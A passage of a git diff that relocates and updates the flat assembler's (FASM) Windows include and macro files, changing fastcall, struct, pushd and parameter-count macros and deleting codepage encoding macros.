 struc none { label . }
diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/PROC32.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/PROC32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/MACRO/PROC32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/PROC32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/PROC64.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/PROC64.INC
old mode 100644
new mode 100755
similarity index 93%
rename from binary/hyperion/source/Fasm/fasminclude/MACRO/PROC64.INC
rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/PROC64.INC
index 9ef292a..1fba99b
--- a/binary/hyperion/source/Fasm/fasminclude/MACRO/PROC64.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/MACRO/PROC64.INC
@@ -73,7 +73,7 @@ macro fastcall proc,[arg]
 	 origin = $
 	 inc param
 	 load opcode byte from origin
-	 if opcode = 67h
+	 if opcode = 67h | opcode = 41h
 	  load opcode byte from origin+1
 	 end if
 	 if opcode and 0F8h = 48h
@@ -106,6 +106,9 @@ macro fastcall proc,[arg]
 	   end if
 	  end if
 	 end if
+	 if vararg@fastcall & ~ param eq rcx
+	   movq rcx,xmm0
+	 end if
 	else if type@param eq addr
 	 if ~ param eq rcx
 	  lea rcx,[param]
@@ -146,6 +149,9 @@ macro fastcall proc,[arg]
 	   end if
 	  end if
 	 end if
+	 if vararg@fastcall & ~ param eq rdx
+	   movq rdx,xmm1
+	 end if
 	else if type@param eq addr
 	 if ~ param eq rdx
 	  lea rdx,[param]
@@ -186,6 +192,9 @@ macro fastcall proc,[arg]
 	   end if
 	  end if
 	 end if
+	 if vararg@fastcall & ~ param eq r8
+	   movq r8,xmm2
+	 end if
 	else if type@param eq addr
 	 if ~ param eq r8
 	  lea r8,[param]
@@ -226,6 +235,9 @@ macro fastcall proc,[arg]
 	   end if
 	  end if
 	 end if
+	 if vararg@fastcall & ~ param eq r9
+	   movq r9,xmm3
+	 end if
 	else if type@param eq addr
 	 if ~ param eq r9
 	  lea r9,[param]
@@ -449,7 +461,7 @@ macro initlocal@proc name,def
       current@initlocal = 4
       load dword@initlocal dword from name+position@initlocal
      else
-      load qword@initlocal dword from name+position@initlocal
+      load qword@initlocal qword from name+position@initlocal
       if ( qword@initlocal > 0 & qword@initlocal < 80000000h ) | ( qword@initlocal < 0 & qword@initlocal >= -80000000h )
        current@initlocal = 8
       else
@@ -594,5 +606,13 @@ macro static_rsp_close procname,flag,parmbytes,localbytes,reglist
    restore size@frame,current@frame }
 
 stdcall fix fastcall
-ccall fix fastcall
-cinvoke fix invoke
+
+macro cinvoke proc,[arg]
+ { common ccall [proc],arg }
+
+macro ccall proc,[arg]
+ { common vararg@fastcall = 1
+	  fastcall proc,arg
+	  vararg@fastcall = 0 }
+
+vararg@fastcall = 0
\ No newline at end of file
diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/RESOURCE.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/RESOURCE.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/MACRO/RESOURCE.INC
rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/RESOURCE.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/STRUCT.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/STRUCT.INC
old mode 100644
new mode 100755
similarity index 56%
rename from binary/hyperion/source/Fasm/fasminclude/MACRO/STRUCT.INC
rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/STRUCT.INC
index 789dd17..aa5f99a
--- a/binary/hyperion/source/Fasm/fasminclude/MACRO/STRUCT.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/MACRO/STRUCT.INC
@@ -3,77 +3,53 @@
 
 macro struct name
  { virtual at 0
-   fields@struct equ name
-   match child parent, name \{ fields@struct equ child,fields@\#parent \}
+   define @struct
+   field@struct equ name
+   match child parent, name \{ restore field@struct
+			       field@struct equ child,fields@\#parent \}
    sub@struct equ
-   struc db [val] \{ \common define field@struct .,db,
-			     fields@struct equ fields@struct,field@struct \}
-   struc dw [val] \{ \common define field@struct .,dw,
-			     fields@struct equ fields@struct,field@struct \}
-   struc du [val] \{ \common define field@struct .,du,
-			     fields@struct equ fields@struct,field@struct \}
-   struc dd [val] \{ \common define field@struct .,dd,
-			     fields@struct equ fields@struct,field@struct \}
-   struc dp [val] \{ \common define field@struct .,dp,
-			     fields@struct equ fields@struct,field@struct \}
-   struc dq [val] \{ \common define field@struct .,dq,
-			     fields@struct equ fields@struct,field@struct \}
-   struc dt [val] \{ \common define field@struct .,dt,
-			     fields@struct equ fields@struct,field@struct \}
-   struc rb count \{ define field@struct .,db,count dup (?)
-		     fields@struct equ fields@struct,field@struct \}
-   struc rw count \{ define field@struct .,dw,count dup (?)
-		     fields@struct equ fields@struct,field@struct \}
-   struc rd count \{ define field@struct .,dd,count dup (?)
-		     fields@struct equ fields@struct,field@struct \}
-   struc rp count \{ define field@struct .,dp,count dup (?)
-		     fields@struct equ fields@struct,field@struct \}
-   struc rq count \{ define field@struct .,dq,count dup (?)
-		     fields@struct equ fields@struct,field@struct \}
-   struc rt count \{ define field@struct .,dt,count dup (?)
-		     fields@struct equ fields@struct,field@struct \}
+   struc db [val] \{ \common define field@struct .,db, \}
+   struc dw [val] \{ \common define field@struct .,dw, \}
+   struc du [val] \{ \common define field@struct .,du, \}
+   struc dd [val] \{ \common define field@struct .,dd, \}
+   struc dp [val] \{ \common define field@struct .,dp, \}
+   struc dq [val] \{ \common define field@struct .,dq, \}
+   struc dt [val] \{ \common define field@struct .,dt, \}
+   struc rb count \{ define field@struct .,db,count dup (?) \}
+   struc rw count \{ define field@struct .,dw,count dup (?) \}
+   struc rd count \{ define field@struct .,dd,count dup (?) \}
+   struc rp count \{ define field@struct .,dp,count dup (?) \}
+   struc rq count \{ define field@struct .,dq,count dup (?) \}
+   struc rt count \{ define field@struct .,dt,count dup (?) \}
    macro db [val] \{ \common \local anonymous
-		     define field@struct anonymous,db,
-		     fields@struct equ fields@struct,field@struct \}
+		     define field@struct anonymous,db, \}
    macro dw [val] \{ \common \local anonymous
-		     define field@struct anonymous,dw,
-		     fields@struct equ fields@struct,field@struct \}
+		     define field@struct anonymous,dw, \}
    macro du [val] \{ \common \local anonymous
-		     define field@struct anonymous,du,
-		     fields@struct equ fields@struct,field@struct \}
+		     define field@struct anonymous,du, \}
    macro dd [val] \{ \common \local anonymous
-		     define field@struct anonymous,dd,
-		     fields@struct equ fields@struct,field@struct \}
+		     define field@struct anonymous,dd, \}
    macro dp [val] \{ \common \local anonymous
-		     define field@struct anonymous,dp,
-		     fields@struct equ fields@struct,field@struct \}
+		     define field@struct anonymous,dp, \}
    macro dq [val] \{ \common \local anonymous
-		     define field@struct anonymous,dq,
-		     fields@struct equ fields@struct,field@struct \}
+		     define field@struct anonymous,dq, \}
    macro dt [val] \{ \common \local anonymous
-		     define field@struct anonymous,dt,
-		     fields@struct equ fields@struct,field@struct \}
+		     define field@struct anonymous,dt, \}
    macro rb count \{ \local anonymous
-		     define field@struct anonymous,db,count dup (?)
-		     fields@struct equ fields@struct,field@struct \}
+		     define field@struct anonymous,db,count dup (?) \}
    macro rw count \{ \local anonymous
-		     define field@struct anonymous,dw,count dup (?)
-		     fields@struct equ fields@struct,field@struct \}
+		     define field@struct anonymous,dw,count dup (?) \}
    macro rd count \{ \local anonymous
-		     define field@struct anonymous,dd,count dup (?)
-		     fields@struct equ fields@struct,field@struct \}
+		     define field@struct anonymous,dd,count dup (?) \}
    macro rp count \{ \local anonymous
-		     define field@struct anonymous,dp,count dup (?)
-		     fields@struct equ fields@struct,field@struct \}
+		     define field@struct anonymous,dp,count dup (?) \}
    macro rq count \{ \local anonymous
-		     define field@struct anonymous,dq,count dup (?)
-		     fields@struct equ fields@struct,field@struct \}
+		     define field@struct anonymous,dq,count dup (?) \}
    macro rt count \{ \local anonymous
-		     define field@struct anonymous,dt,count dup (?)
-		     fields@struct equ fields@struct,field@struct \}
-   macro union \{ fields@struct equ fields@struct,,union,<
+		     define field@struct anonymous,dt,count dup (?) \}
+   macro union \{ field@struct equ ,union,<
 		  sub@struct equ union \}
-   macro struct \{ fields@struct equ fields@struct,,substruct,<
+   macro struct \{ field@struct equ ,substruct,<
 		  sub@struct equ substruct \} }
 
 macro ends
@@ -82,15 +58,19 @@ macro ends
 			 purge db,dw,du,dd,dp,dq,dt
 			 purge rb,rw,rd,rp,rq,rt
 			 purge union,struct
+			 irpv fields,field@struct \\{ restore field@struct
+						      \\common define fields@struct fields \\}
 			 match name tail,fields@struct, \\{ if $
 							    display 'Error: definition of ',\\`name,' contains illegal instructions.',0Dh,0Ah
 							    err
 							    end if \\}
-			 match name=,fields,fields@struct \\{ fields@struct equ
+			 match name=,fields,fields@struct \\{ restore @struct
 							      make@struct name,fields
 							      define fields@\\#name fields \\}
 			 end virtual \}
-   match any, sub@struct \{ fields@struct equ fields@struct> \}
+   match any, sub@struct \{ tmp@struct equ field@struct
+			    restore field@struct
+			    field@struct equ tmp@struct> \}
    restore sub@struct }
 
 macro make@struct name,[field,type,def]
@@ -133,8 +113,8 @@ macro define@struct name,[field,type,def]
     restruc name
     match values, list \{
     struc name value \\{ \\local \\..base
-    match any, fields@struct \\\{ fields@struct equ fields@struct,.,name, \\\}
-    match , fields@struct \\\{ label \\..base
+    match , @struct \\\{ define field@struct .,name, \\\}
+    match no, @struct \\\{ label \\..base
    forward
      match , value \\\\{ field type def \\\\}
      match any, value \\\\{ field type value
@@ -144,9 +124,9 @@ macro define@struct name,[field,type,def]
    common label . at \\..base \\\}
    \\}
     macro name value \\{
-    match any, fields@struct \\\{ \\\local anonymous
-				  fields@struct equ fields@struct,anonymous,name, \\\}
-    match , fields@struct \\\{
+    match , @struct \\\{ \\\local anonymous
+				  define field@struct anonymous,name, \\\}
+    match no, @struct \\\{
    forward
      match , value \\\\{ type def \\\\}
      match any, value \\\\{ \\\\local ..field
@@ -217,6 +197,7 @@ macro define@substruct parent,name,[field,type,def]
  { common
     virtual at parent#.#name
    forward
+    local value
     if ~ field eq .
      parent#field type def
      sizeof.#parent#field = $ - parent#field
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/ADVAPI32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/ADVAPI32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/ADVAPI32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/ADVAPI32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/COMCTL32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/COMCTL32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/COMCTL32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/COMCTL32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/COMDLG32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/COMDLG32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/COMDLG32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/COMDLG32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/GDI32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/GDI32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/GDI32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/GDI32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/KERNEL32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/KERNEL32.INC
old mode 100644
new mode 100755
similarity index 95%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/KERNEL32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/KERNEL32.INC
index cdb3efe..12e3372
--- a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/KERNEL32.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/KERNEL32.INC
@@ -358,6 +358,7 @@ PulseEvent% =  1
 PurgeComm% =  2
 QueryDosDevice% =  3
 QueryInformationJobObject% =  5
+QueryPerformanceCounter% = 1
 QueryPerformanceFrequency% =  1
 QueryWin31IniFilesMappedToRegistry% =  4
 QueueUserAPC% =  3
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/SHELL32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/SHELL32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/SHELL32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/SHELL32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/USER32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/USER32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/USER32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/USER32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/PCOUNT/WSOCK32.INC b/binary/hyperion/source/Fasm/INCLUDE/PCOUNT/WSOCK32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/PCOUNT/WSOCK32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/PCOUNT/WSOCK32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN32A.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN32A.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/WIN32A.INC
rename to binary/hyperion/source/Fasm/INCLUDE/WIN32A.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN32AX.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN32AX.INC
old mode 100644
new mode 100755
similarity index 91%
rename from binary/hyperion/source/Fasm/fasminclude/WIN32AX.INC
rename to binary/hyperion/source/Fasm/INCLUDE/WIN32AX.INC
index 8f9d1a5..989f361
--- a/binary/hyperion/source/Fasm/fasminclude/WIN32AX.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/WIN32AX.INC
@@ -75,15 +75,10 @@ macro pushd value
    ..continue:
    pushd equ \}
   match pushd =addr var,pushd value \{ \local ..opcode,..address
-   virtual at 0
-    label ..address at var
-    mov eax,dword [..address]
-    load ..opcode from 0
-   end virtual
-   if ..opcode = 0A1h
+   if +var relativeto 0 | +var relativeto $
     push var
    else
-    lea edx,[..address]
+    lea edx,[var]
     push edx
    end if
    pushd equ \}
diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN32AXP.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN32AXP.INC
old mode 100644
new mode 100755
similarity index 85%
rename from binary/hyperion/source/Fasm/fasminclude/WIN32AXP.INC
rename to binary/hyperion/source/Fasm/INCLUDE/WIN32AXP.INC
index af339aa..ff3c3c1
--- a/binary/hyperion/source/Fasm/fasminclude/WIN32AXP.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/WIN32AXP.INC
@@ -43,11 +43,9 @@ macro allow_nesting
      \forward count@stdcall = count@stdcall+1
 	      match =double value, arg \\{ count@stdcall = count@stdcall+1 \\}
      \common end if
-	     if defined proc \# %
-	      if count@stdcall <> proc \# %
-	       display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah
-	       err
-	      end if
+	     if proc eqtype 0 & defined proc \# % & count@stdcall <> proc \# %
+	      display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah
+	      assert 0
 	     end if
      \reverse pushd 
      \common call [proc] \}
@@ -57,11 +55,9 @@ macro allow_nesting
      \forward count@stdcall = count@stdcall+1
 	      match =double value, arg \\{ count@stdcall = count@stdcall+1 \\}
      \common end if
-	     if defined proc \# %
-	      if count@stdcall <> proc \# %
-	       display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah
-	       err
-	      end if
+	     if proc eqtype 0 & defined proc \# % & count@stdcall <> proc \# %
+	      display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah
+	      assert 0
 	     end if
      \reverse pushd 
      \common call proc \}
@@ -97,15 +93,10 @@ macro pushd value
    ..continue:
    pushd equ \}
   match pushd =addr var,pushd value \{ \local ..opcode,..address
-   virtual at 0
-    label ..address at var
-    mov eax,dword [..address]
-    load ..opcode from 0
-   end virtual
-   if ..opcode = 0A1h
+   if +var relativeto 0 | +var relativeto $
     push var
    else
-    lea edx,[..address]
+    lea edx,[var]
     push edx
    end if
    pushd equ \}
diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN32W.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN32W.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/WIN32W.INC
rename to binary/hyperion/source/Fasm/INCLUDE/WIN32W.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN32WX.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN32WX.INC
old mode 100644
new mode 100755
similarity index 91%
rename from binary/hyperion/source/Fasm/fasminclude/WIN32WX.INC
rename to binary/hyperion/source/Fasm/INCLUDE/WIN32WX.INC
index c5b7d91..2c74b53
--- a/binary/hyperion/source/Fasm/fasminclude/WIN32WX.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/WIN32WX.INC
@@ -76,15 +76,10 @@ macro pushd value
    ..continue:
    pushd equ \}
   match pushd =addr var,pushd value \{ \local ..opcode,..address
-   virtual at 0
-    label ..address at var
-    mov eax,dword [..address]
-    load ..opcode from 0
-   end virtual
-   if ..opcode = 0A1h
+   if +var relativeto 0 | +var relativeto $
     push var
    else
-    lea edx,[..address]
+    lea edx,[var]
     push edx
    end if
    pushd equ \}
diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN32WXP.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN32WXP.INC
old mode 100644
new mode 100755
similarity index 86%
rename from binary/hyperion/source/Fasm/fasminclude/WIN32WXP.INC
rename to binary/hyperion/source/Fasm/INCLUDE/WIN32WXP.INC
index 6dd72ec..f421cc2
--- a/binary/hyperion/source/Fasm/fasminclude/WIN32WXP.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/WIN32WXP.INC
@@ -43,11 +43,9 @@ macro allow_nesting
      \forward count@stdcall = count@stdcall+1
 	      match =double value, arg \\{ count@stdcall = count@stdcall+1 \\}
      \common end if
-	     if defined proc \# %
-	      if count@stdcall <> proc \# %
-	       display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah
-	       err
-	      end if
+	     if proc eqtype 0 & defined proc \# % & count@stdcall <> proc \# %
+	      display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah
+	      assert 0
 	     end if
      \reverse pushd 
      \common call [proc] \}
@@ -57,11 +55,9 @@ macro allow_nesting
      \forward count@stdcall = count@stdcall+1
 	      match =double value, arg \\{ count@stdcall = count@stdcall+1 \\}
      \common end if
-	     if defined proc \# %
-	      if count@stdcall <> proc \# %
-	       display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah
-	       err
-	      end if
+	     if proc eqtype 0 & defined proc \# % & count@stdcall <> proc \# %
+	      display "Error: invalid count of parameters for ",\`proc,".",0Dh,0Ah
+	      assert 0
 	     end if
      \reverse pushd 
      \common call proc \}
@@ -98,15 +94,10 @@ macro pushd value
    ..continue:
    pushd equ \}
   match pushd =addr var,pushd value \{ \local ..opcode,..address
-   virtual at 0
-    label ..address at var
-    mov eax,dword [..address]
-    load ..opcode from 0
-   end virtual
-   if ..opcode = 0A1h
+   if +var relativeto 0 | +var relativeto $
     push var
    else
-    lea edx,[..address]
+    lea edx,[var]
     push edx
    end if
    pushd equ \}
diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN64A.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN64A.INC
old mode 100644
new mode 100755
similarity index 91%
rename from binary/hyperion/source/Fasm/fasminclude/WIN64A.INC
rename to binary/hyperion/source/Fasm/INCLUDE/WIN64A.INC
index c94e2b4..ca02736
--- a/binary/hyperion/source/Fasm/fasminclude/WIN64A.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/WIN64A.INC
@@ -14,7 +14,7 @@ sizeof.TCHAR = 1
 
 include 'equates/kernel64.inc'
 include 'equates/user64.inc'
-include 'equates/gdi32.inc'
+include 'equates/gdi64.inc'
 include 'equates/comctl64.inc'
 include 'equates/comdlg64.inc'
 include 'equates/shell64.inc'
diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN64AX.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN64AX.INC
old mode 100644
new mode 100755
similarity index 94%
rename from binary/hyperion/source/Fasm/fasminclude/WIN64AX.INC
rename to binary/hyperion/source/Fasm/INCLUDE/WIN64AX.INC
index 9f8cdff..42dc7db
--- a/binary/hyperion/source/Fasm/fasminclude/WIN64AX.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/WIN64AX.INC
@@ -65,7 +65,7 @@ macro allow_nesting
 		 end if
 		end if
 		..next: \\}
-	      list equ list param
+	      list equ list 
      \common ..close_nest:
 	     match ,nested_frame \\{ endf \\}
 	     if flags and 1
diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN64AXP.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN64AXP.INC
old mode 100644
new mode 100755
similarity index 90%
rename from binary/hyperion/source/Fasm/fasminclude/WIN64AXP.INC
rename to binary/hyperion/source/Fasm/INCLUDE/WIN64AXP.INC
index fb562f5..838c7c7
--- a/binary/hyperion/source/Fasm/fasminclude/WIN64AXP.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/WIN64AXP.INC
@@ -65,7 +65,7 @@ macro allow_nesting
 		 end if
 		end if
 		..next: \\}
-	      list equ list param
+	      match any,param \\{ list equ list  \\}
      \common ..close_nest:
 	     match ,nested_frame \\{ endf \\}
 	     if flags and 1
@@ -132,11 +132,9 @@ macro allow_nesting
 	     match ,outer_frame \\{ endf \\}
 	     proc@paramcheck equ proc
 	     match [name],proc \\{ define proc@paramcheck name \\}
-	     match name,proc@paramcheck \\{ if defined name \\# %
-					     if counter <> name \\# %
-					      display "Error: invalid count of parameters for ",\\`name,".",0Dh,0Ah
-					      err
-					     end if
+	     match name,proc@paramcheck \\{ if name eqtype 0 & defined name \\# % & counter <> name \\# %
+					     display "Error: invalid count of parameters for ",\\`name,".",0Dh,0Ah
+					     assert 0
 					    end if \\} \} }
 
 allow_nesting
diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN64W.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN64W.INC
old mode 100644
new mode 100755
similarity index 91%
rename from binary/hyperion/source/Fasm/fasminclude/WIN64W.INC
rename to binary/hyperion/source/Fasm/INCLUDE/WIN64W.INC
index 345f8b7..c18ddfd
--- a/binary/hyperion/source/Fasm/fasminclude/WIN64W.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/WIN64W.INC
@@ -14,7 +14,7 @@ sizeof.TCHAR = 2
 
 include 'equates/kernel64.inc'
 include 'equates/user64.inc'
-include 'equates/gdi32.inc'
+include 'equates/gdi64.inc'
 include 'equates/comctl64.inc'
 include 'equates/comdlg64.inc'
 include 'equates/shell64.inc'
diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN64WX.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN64WX.INC
old mode 100644
new mode 100755
similarity index 94%
rename from binary/hyperion/source/Fasm/fasminclude/WIN64WX.INC
rename to binary/hyperion/source/Fasm/INCLUDE/WIN64WX.INC
index 8a07cec..5da6add
--- a/binary/hyperion/source/Fasm/fasminclude/WIN64WX.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/WIN64WX.INC
@@ -65,7 +65,7 @@ macro allow_nesting
 		 end if
 		end if
 		..next: \\}
-	      list equ list param
+	      list equ list 
      \common ..close_nest:
 	     match ,nested_frame \\{ endf \\}
 	     if flags and 1
diff --git a/binary/hyperion/source/Fasm/fasminclude/WIN64WXP.INC b/binary/hyperion/source/Fasm/INCLUDE/WIN64WXP.INC
old mode 100644
new mode 100755
similarity index 90%
rename from binary/hyperion/source/Fasm/fasminclude/WIN64WXP.INC
rename to binary/hyperion/source/Fasm/INCLUDE/WIN64WXP.INC
index 91810dc..19640e8
--- a/binary/hyperion/source/Fasm/fasminclude/WIN64WXP.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/WIN64WXP.INC
@@ -65,7 +65,7 @@ macro allow_nesting
 		 end if
 		end if
 		..next: \\}
-	      list equ list param
+	      match any,param \\{ list equ list  \\}
      \common ..close_nest:
 	     match ,nested_frame \\{ endf \\}
 	     if flags and 1
@@ -132,11 +132,9 @@ macro allow_nesting
 	     match ,outer_frame \\{ endf \\}
 	     proc@paramcheck equ proc
 	     match [name],proc \\{ define proc@paramcheck name \\}
-	     match name,proc@paramcheck \\{ if defined name \\# %
-					     if counter <> name \\# %
-					      display "Error: invalid count of parameters for ",\\`name,".",0Dh,0Ah
-					      err
-					     end if
+	     match name,proc@paramcheck \\{ if name eqtype 0 & defined name \\# % & counter <> name \\# %
+					     display "Error: invalid count of parameters for ",\\`name,".",0Dh,0Ah
+					     assert 0
 					    end if \\} \} }
 
 allow_nesting
diff --git a/binary/hyperion/source/Fasm/fasm.exe b/binary/hyperion/source/Fasm/fasm.exe
old mode 100644
new mode 100755
index e4fcfa2..d826ca9
Binary files a/binary/hyperion/source/Fasm/fasm.exe and b/binary/hyperion/source/Fasm/fasm.exe differ
diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1250.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1250.INC
deleted file mode 100644
index e4cf008..0000000
--- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1250.INC
+++ /dev/null
@@ -1,39 +0,0 @@
-
-; Windows 1250
-
-macro du [arg]
- { local offset,char
-   offset = $-$$
-   du arg
-   if arg eqtype ''
-    repeat ($-offset-$$)/2
-     load char byte from $$+offset+(%-1)*2
-     if char > 7Fh
-      virtual at 0
-      if char < 90h
-       dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,160h,2039h,15Ah,164h,17Dh,179h
-      else if char < 0A0h
-       dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,161h,203Ah,15Bh,165h,17Eh,17Ah
-      else if char < 0B0h
-       dw 0A0h,2C7h,2D8h,141h,0A4h,104h,0A6h,0A7h,0A8h,0A9h,15Eh,0ABh,0ACh,0ADh,0AEh,17Bh
-      else if char < 0C0h
-       dw 0B0h,0B1h,2DBh,142h,0B4h,0B5h,0B6h,0B7h,0B8h,105h,15Fh,0BBh,13Dh,2DDh,13Eh,17Ch
-      else if char < 0D0h
-       dw 154h,0C1h,0C2h,102h,0C4h,139h,106h,0C7h,10Ch,0C9h,118h,0CBh,11Ah,0CDh,0CEh,10Eh
-      else if char < 0E0h
-       dw 110h,143h,147h,0D3h,0D4h,150h,0D6h,0D7h,158h,16Eh,0DAh,170h,0DCh,0DDh,162h,0DFh
-      else if char < 0F0h
-       dw 155h,0E1h,0E2h,103h,0E4h,13Ah,107h,0E7h,10Dh,0E9h,119h,0EBh,11Bh,0EDh,0EEh,10Fh
-      else
-       dw 111h,144h,148h,0F3h,0F4h,151h,0F6h,0F7h,159h,16Fh,0FAh,171h,0FCh,0FDh,163h,2D9h
-      end if
-      load char word from (char and 0Fh)*2
-      end virtual
-      store word char at $$+offset+(%-1)*2
-     end if
-    end repeat
-   end if }
-
-struc du [args]
- { common label . word
-   du args }
diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1251.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1251.INC
deleted file mode 100644
index 52eed10..0000000
--- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1251.INC
+++ /dev/null
@@ -1,35 +0,0 @@
-
-; Windows 1251
-
-macro du [arg]
- { local offset,char
-   offset = $-$$
-   du arg
-   if arg eqtype ''
-    repeat ($-offset-$$)/2
-     load char byte from $$+offset+(%-1)*2
-     if char > 7Fh
-      if char < 0C0h
-       virtual at 0
-       if char < 90h
-	dw 401h,403h,201Ah,453h,201Eh,2026h,2020h,2021h,20ACh,2030h,409h,2039h,40Ah,40Ch,40Bh,40Fh
-       else if char < 0A0h
-	dw 452h,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,459h,203Ah,45Ah,45Ch,45Bh,45Fh
-       else if char < 0B0h
-	dw 0A0h,40Eh,45Eh,408h,0A4h,490h,0A6h,0A7h,401h,0A9h,404h,0ABh,0ACh,0ADh,0AEh,407h
-       else
-	dw 0B0h,0B1h,406h,456h,491h,0B5h,0B6h,0B7h,451h,2116h,454h,0BBh,458h,405h,455h,457h
-       end if
-       load char word from (char and 0Fh)*2
-       end virtual
-      else
-       char = 410h+char-0C0h
-      end if
-      store word char at $$+offset+(%-1)*2
-     end if
-    end repeat
-   end if }
-
-struc du [args]
- { common label . word
-   du args }
diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1252.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1252.INC
deleted file mode 100644
index 9a2c3dc..0000000
--- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1252.INC
+++ /dev/null
@@ -1,27 +0,0 @@
-
-; Windows 1252
-
